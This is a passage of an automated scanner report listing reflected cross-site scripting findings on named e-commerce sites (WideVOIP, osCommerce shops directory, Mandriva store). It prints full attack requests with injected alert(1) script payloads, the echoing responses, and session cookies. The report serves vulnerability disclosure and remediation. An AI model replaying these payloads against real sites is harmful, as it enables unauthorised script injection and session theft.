Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DxCL3WawnAVg%3DgU1t2cjcXek%3D3DVf7c5e2HA%3DhjdJFbhNQ0k%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:31:55 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/modules/blockcart7f822'-alert(1)-'980798d9648/blockcart-set-collapse.php?ajax_blockcart_display=expand&amp;rand=1305473193548', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.29. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /modules/blockcart/blockcart-set-collapse.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4da3'-alert(1)-'3d4cd63b528 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/blockcart/blockcart-set-collapse.phpc4da3'-alert(1)-'3d4cd63b528?ajax_blockcart_display=expand&rand=1305473193548 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DxCL3WawnAVg%3DgU1t2cjcXek%3D3DVf7c5e2HA%3DhjdJFbhNQ0k%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:32:32 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.phpc4da3'-alert(1)-'3d4cd63b528?ajax_blockcart_display=expand&amp;rand=1305473193548', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.30. https://shop.widevoip.com/order.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /order.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ebf3'-alert(1)-'989b9edb336 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /order.php6ebf3'-alert(1)-'989b9edb336?step=1 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3Dv%2BJlLMi4mqs%3DQ1c2A99bBVM%3D4trpz3Fyq6w%3DvUCdZwdXaeE%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:33:01 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 17207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/order.php6ebf3'-alert(1)-'989b9edb336?step=1', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.31. https://shop.widevoip.com/order.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /order.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fba44'-alert(1)-'92ed8ffb93c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /order.php?st/fba44'-alert(1)-'92ed8ffb93cep=1 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3Dv%2BJlLMi4mqs%3DQ1c2A99bBVM%3D4trpz3Fyq6w%3DvUCdZwdXaeE%3D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:31:07 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 22762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/order.php?st/fba44'-alert(1)-'92ed8ffb93cep=1', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.32. https://shop.widevoip.com/order.php [step parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /order.php

Issue detail

The value of the step request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3564'-alert(1)-'7235c17c5e2 was submitted in the step parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /order.php?step=b3564'-alert(1)-'7235c17c5e2 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3Dv%2BJlLMi4mqs%3DQ1c2A99bBVM%3D4trpz3Fyq6w%3DvUCdZwdXaeE%3D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:27:39 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 22784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/order.php?step=b3564'-alert(1)-'7235c17c5e2', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.33. https://shop.widevoip.com/prices-drop.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /prices-drop.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd069'-alert(1)-'38a4fe86abd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /prices-drop.phpbd069'-alert(1)-'38a4fe86abd HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3Dv%2BJlLMi4mqs%3DQ1c2A99bBVM%3D4trpz3Fyq6w%3DvUCdZwdXaeE%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:30:56 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 17198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/prices-drop.phpbd069'-alert(1)-'38a4fe86abd', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.34. https://shop.widevoip.com/prices-drop.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /prices-drop.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85341'-alert(1)-'2eed22d8f74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /prices-drop.php?85341'-alert(1)-'2eed22d8f74=1 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3Dv%2BJlLMi4mqs%3DQ1c2A99bBVM%3D4trpz3Fyq6w%3DvUCdZwdXaeE%3D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:28:22 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 42878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP - Promotions</titl
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/prices-drop.php?85341'-alert(1)-'2eed22d8f74=1', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.35. http://shops.oscommerce.com/live_shops_frameset_header.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.oscommerce.com
Path:   /live_shops_frameset_header.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e85"><script>alert(1)</script>fbac2c01b52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /live_shops_frameset_header.php?url=http://printingcanvas.co/62e85"><script>alert(1)</script>fbac2c01b52.uk/ HTTP/1.1
Host: shops.oscommerce.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,21173
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=231096321.1305467786.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); session_id=04312bf650bb8c4cb465ccf73be3ae4d; __unam=e29daef-12ff3f28215-504ba932-1; __utma=231096321.966955857.1305467786.1305467786.1305467786.1; __utmc=231096321; __utmb=231096321.7.10.1305467786; __utmz=113864261.1305467920.1.1.utmcsr=oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113864261.57877410.1305467920.1305467920.1305467920.1; __utmc=113864261; __utmb=113864261.1.10.1305467920

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:00:58 GMT
Server: Apache/2.2.17
Content-Length: 1234
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>

<title>osCommerce, Open Source E-Commerce Solutions</title>

<base href="http://www.oscommerce.com/">

<style type="text
...[SNIP]...
<a href="mailto:hpdl@oscommerce.com?subject=Bad Site: http://printingcanvas.co/62e85"><script>alert(1)</script>fbac2c01b52.uk/">
...[SNIP]...

3.36. http://shops.oscommerce.com/live_shops_frameset_header.php [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.oscommerce.com
Path:   /live_shops_frameset_header.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a93c"><script>alert(1)</script>9c6c852bf29 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /live_shops_frameset_header.php?url=http://printingcanvas.co.uk/7a93c"><script>alert(1)</script>9c6c852bf29 HTTP/1.1
Host: shops.oscommerce.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,21173
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=231096321.1305467786.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); session_id=04312bf650bb8c4cb465ccf73be3ae4d; __unam=e29daef-12ff3f28215-504ba932-1; __utma=231096321.966955857.1305467786.1305467786.1305467786.1; __utmc=231096321; __utmb=231096321.7.10.1305467786; __utmz=113864261.1305467920.1.1.utmcsr=oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113864261.57877410.1305467920.1305467920.1305467920.1; __utmc=113864261; __utmb=113864261.1.10.1305467920

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:00:25 GMT
Server: Apache/2.2.17
Content-Length: 1232
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>

<title>osCommerce, Open Source E-Commerce Solutions</title>

<base href="http://www.oscommerce.com/">

<style type="text
...[SNIP]...
<a href="mailto:hpdl@oscommerce.com?subject=Bad Site: http://printingcanvas.co.uk/7a93c"><script>alert(1)</script>9c6c852bf29">
...[SNIP]...

3.37. http://store.mandriva.com/ [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c93eb"><script>alert(1)</script>6b83a8f7561 was submitted in the action parameter. This input was echoed as c93eb\"><script>alert(1)</script>6b83a8f7561 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=buy_nowc93eb"><script>alert(1)</script>6b83a8f7561&products_id=495 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/g/style/reset-fonts-grids.css
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.1.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:29:33 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13815

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <meta name="verify-v1" content="0fEbSr6Xb4TWnbDkESAq/WBiiZHhQjCaPpyp4egW
...[SNIP]...
<a href="index.php?action=buy_nowc93eb\"><script>alert(1)</script>6b83a8f7561&products_id=495&currency=USD" title="Switch prices to US$">
...[SNIP]...

3.38. http://store.mandriva.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af4a"><script>alert(1)</script>8d27ed95a34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1af4a"><script>alert(1)</script>8d27ed95a34=1 HTTP/1.1
Host: store.mandriva.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,26271
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:01:08 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Set-Cookie: osCsid=4a1b45ead74e830845bca35b915c2bb9; path=/; domain=store.mandriva.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16472

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <meta name="verify-v1" content="0fEbSr6Xb4TWnbDkESAq/WBiiZHhQjCaPpyp4egW
...[SNIP]...
<a href="index.php?1af4a"><script>alert(1)</script>8d27ed95a34=1&currency=USD" title="Switch prices to US$">
...[SNIP]...

3.39. http://store.mandriva.com/product_info.php [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /product_info.php

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70a71"><script>alert(1)</script>b9f1f9d6353d18760 was submitted in the action parameter. This input was echoed as 70a71\"><script>alert(1)</script>b9f1f9d6353d18760 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /product_info.php?products_id=495&action=add_product70a71"><script>alert(1)</script>b9f1f9d6353d18760&id%5B24%5D=88&products_id=495 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/product_info.php?products_id=495
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.2.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:31:50 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14037

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<link rel="canonical" href="/product_info.php?products_id=495&currency=EUR&language=english" />
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<a href="product_info.php?products_id=495&action=add_product70a71\"><script>alert(1)</script>b9f1f9d6353d18760&id=Array&currency=USD" title="Switch prices to US$">
...[SNIP]...

3.40. http://store.mandriva.com/product_info.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /product_info.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9b33"><script>alert(1)</script>3a01f5b1865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /product_info.php?products_id=495&d9b33"><script>alert(1)</script>3a01f5b1865=1 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/g/style/reset-fonts-grids.css
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.1.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:33:36 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14048

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<link rel="canonical" href="/product_info.php?products_id=495&currency=EUR&language=english" />
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
